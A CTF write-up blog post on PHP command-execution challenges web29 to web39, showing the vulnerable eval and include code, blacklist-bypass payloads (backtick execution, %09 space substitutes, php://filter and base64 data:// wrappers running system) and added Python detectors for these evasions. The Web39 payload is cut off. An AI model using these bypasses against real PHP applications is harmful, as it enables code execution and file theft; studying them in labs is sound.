
web29~web39

Reference blogs:
https://blog.csdn.net/m0_62422842/article/details/125507970
https://www.cnblogs.com/amazingman113/p/16036313.html

Web29

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:26:48
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

payload: ?c=echo `tac fl''ag.php`;

Very little is filtered here, so nl (see below), wildcards and the like can all be used.

The nl command prints a file's contents with line numbers added automatically; it is similar to cat -n.

Web30

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

system is filtered out, so let us look at what can replace system:

(1) The system() function

    Purpose: calls the shell to run a command; returns the command's exit status

(2) The exec() function (execl, execlp, execle, execv, execvp, execvpe)

    Purpose: creates a new process and runs the command in that process

(3) Others: shell_exec(), passthru(), popen(), proc_open(), pcntl_exec()

(4) Backticks

Web31

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

Spaces are filtered: use %09 or %0a (<>, ${IFS}, $IFS$9, {cat,fl*} and %20 do not work in this challenge)

To get around the cat filter use tac, more, less, head, tail, nl, od (binary/hex dump), vi, vim, sort, uniq (vim may not work)
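The defender's side of Web29 to Web31, as an added example that is not part of the original post or the challenge code: a small Python normalizer that undoes the evasions listed above (empty quote pairs such as fl''ag, %09/%0a and ${IFS} standing in for whitespace) before keyword matching, and that looks for every process-spawning primitive from the Web30 list rather than system alone. This is what a log-side or WAF-side check has to do and what the challenge's preg_match does not. The names normalize, analyze and the finding labels are assumptions made for this example; the sample inputs are constructed.

```python
import re
from urllib.parse import unquote_plus

# PHP functions that hand a string to a shell or start a process. The Web30
# notes list these as the calls a blacklist on "system" alone never catches.
EXEC_PRIMITIVES = ("system", "exec", "shell_exec", "passthru", "popen",
                   "proc_open", "pcntl_exec")
EXEC_CALL = re.compile(r"\b(" + "|".join(EXEC_PRIMITIVES) + r")\s*\(")

# Shell whitespace substitutes from the Web31 notes. The value is URL-decoded
# first, so %09 and %0a have already become a tab and a newline at this point.
WHITESPACE_SUBSTITUTE = re.compile(r"\$\{IFS\}|\$IFS(?:\$\d)?|[\t\n\r]")

# Empty quote pairs split a keyword without changing what the shell runs
# (the fl''ag trick in the Web29 payload).
EMPTY_QUOTES = re.compile(r"''|\"\"")


def normalize(c_raw: str) -> str:
    """Fold the evasions above back into the form a naive blacklist expected."""
    text = unquote_plus(c_raw)            # what PHP's $_GET['c'] would contain
    text = EMPTY_QUOTES.sub("", text)     # fl''ag -> flag
    text = WHITESPACE_SUBSTITUTE.sub(" ", text)
    text = re.sub(r" {2,}", " ", text)
    return text.lower()


def analyze(c_raw: str) -> dict:
    """Return the normalized parameter and a list of findings for one request."""
    norm = normalize(c_raw)
    findings = []
    if "`" in norm:
        findings.append("backtick-exec")
    for m in EXEC_CALL.finditer(norm):
        findings.append("exec-primitive:" + m.group(1))
    # A keyword that appears only after normalization is exactly the case the
    # challenge's preg_match on the raw value cannot see.
    for word in ("flag", "system"):
        if word in norm and word not in c_raw.lower():
            findings.append(f"obfuscated-keyword:{word}")
    return {"normalized": norm, "findings": findings}


if __name__ == "__main__":
    # Constructed sample values of the c parameter, as they would appear in an access log.
    for sample in ("echo `tac fl''ag.php`;", "echo%09`tac%09fl''ag.php`;",
                   "passthru('ls');", "echo 1;"):
        print(repr(sample), "->", analyze(sample))
```

The check deliberately compares the normalized text against the raw text: a keyword that was absent before normalization and present after it is evidence of a deliberate bypass, which is a much stronger signal than the keyword alone.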

Web32

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

  1. payload: ?c=include%09$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

  2. data://text/plain;base64,PD9waHAgc3lzdGVtKCJ0YWMgZmxhZy5waHAiKTs/Pg==

The main point is that this program filters parentheses, which leaves many functions unusable; include can include a file without parentheses, so the challenge turns into a file-inclusion problem.

The content pulled in by include does not pass through the preg_match filter, so only the part before it needs care.

The ; can be bypassed with ?>, which closes off whatever comes before it.

The GET parameter is named 1 to get around the quote filter.

Worth noting: with php://filter/ a filename containing a wildcard is treated as a literal filename (for example, *.php looks for a file with exactly that name instead of outputting every file with a .php suffix).


The next few challenges can also be passed with the pseudo-protocol (stream wrapper).

Web39

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 06:13:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
        
}else{
    highlight_file(__FILE__);
}

This one appends .php to the c value we pass in, but since everything we wrote is already closed off, it has no effect.

payload: ?c=data:text/plain,
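An added example, not part of the original post, covering the Web32 and Web39 file-inclusion cases from the defender's side: the include() target and anything fetched through a php:// or data: wrapper never pass through the preg_match on c, so a detector has to look at every query parameter (not just c) and decode data: bodies itself before keyword matching. The blacklist regex is copied from the Web32 source above so the example can show which parameter it actually sees; parse_query, decode_data_uri, inspect_query and the finding labels are assumed names, and the query strings in the __main__ block are constructed to mirror the payloads listed above.

```python
import base64
import re
from urllib.parse import unquote_plus

# The Web32 blacklist, verbatim, applied by the challenge to $_GET['c'] only.
WEB32_BLACKLIST = re.compile(
    r"flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(", re.IGNORECASE)

# Stream wrappers the Web32 and Web39 payloads rely on.
WRAPPERS = ("php:", "data:")
EXEC_CALL = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*\(")


def parse_query(query: str) -> list:
    """Split a raw query string the way PHP fills $_GET: '&' separates pairs,
    the first '=' splits name from value, %XX and '+' are decoded."""
    pairs = []
    for item in query.split("&"):
        if not item:
            continue
        name, _, value = item.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def decode_data_uri(value: str) -> str:
    """Return the body of a data: URI as text; base64 bodies are decoded."""
    header, _, body = value.partition(",")
    if ";base64" in header.lower():
        try:
            return base64.b64decode(body).decode("utf-8", "replace")
        except ValueError:          # binascii.Error is a ValueError subclass
            return ""
    return body                      # plain body was already percent-decoded


def inspect_query(query: str) -> dict:
    """Report wrapper usage and parameter indirection across all parameters,
    plus whether the c parameter would have passed the Web32 blacklist."""
    findings = []
    c_passes = None
    for name, value in parse_query(query):
        low = value.lower()
        if name == "c":
            c_passes = WEB32_BLACKLIST.search(value) is None
            if "?>" in value:                      # ?> used to close the statement
                findings.append("php-close-tag:c")
        if "$_get[" in low or "$_post[" in low:    # value pulled from another parameter
            findings.append(f"param-indirection:{name}")
        if low.startswith(WRAPPERS):
            findings.append(f"wrapper-in-param:{name}:{low.split(':', 1)[0]}")
        if "convert.base64" in low:
            findings.append(f"base64-filter:{name}")
        if low.startswith("data:"):
            # The wrapper body is code the blacklist never saw; check it here.
            for m in EXEC_CALL.finditer(decode_data_uri(value).lower()):
                findings.append(f"data-body-exec:{m.group(1)}")
    return {"c_passes_blacklist": c_passes, "findings": findings}


if __name__ == "__main__":
    # Constructed query strings modelled on the Web32 payloads above.
    samples = (
        "c=include%09$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php",
        "c=include%09$_GET[1]?>&1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ0YWMgZmxhZy5waHAiKTs/Pg==",
        "c=echo 1;",
    )
    for q in samples:
        print(q, "->", inspect_query(q))
```

On the first two samples c_passes_blacklist comes back True even though the request clearly loads flag.php or runs system(): the regex only ever sees "include<TAB>$_GET[1]?>". That is the concrete reason a blacklist on one parameter is not a control, and why the Web39 suffix (".php" appended to c) changes nothing for a data: body either; the wrapper check above does not depend on what is appended after the body.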

Posted @ 2025-04-15 23:01  huidu01  Views (40)  Comments (0)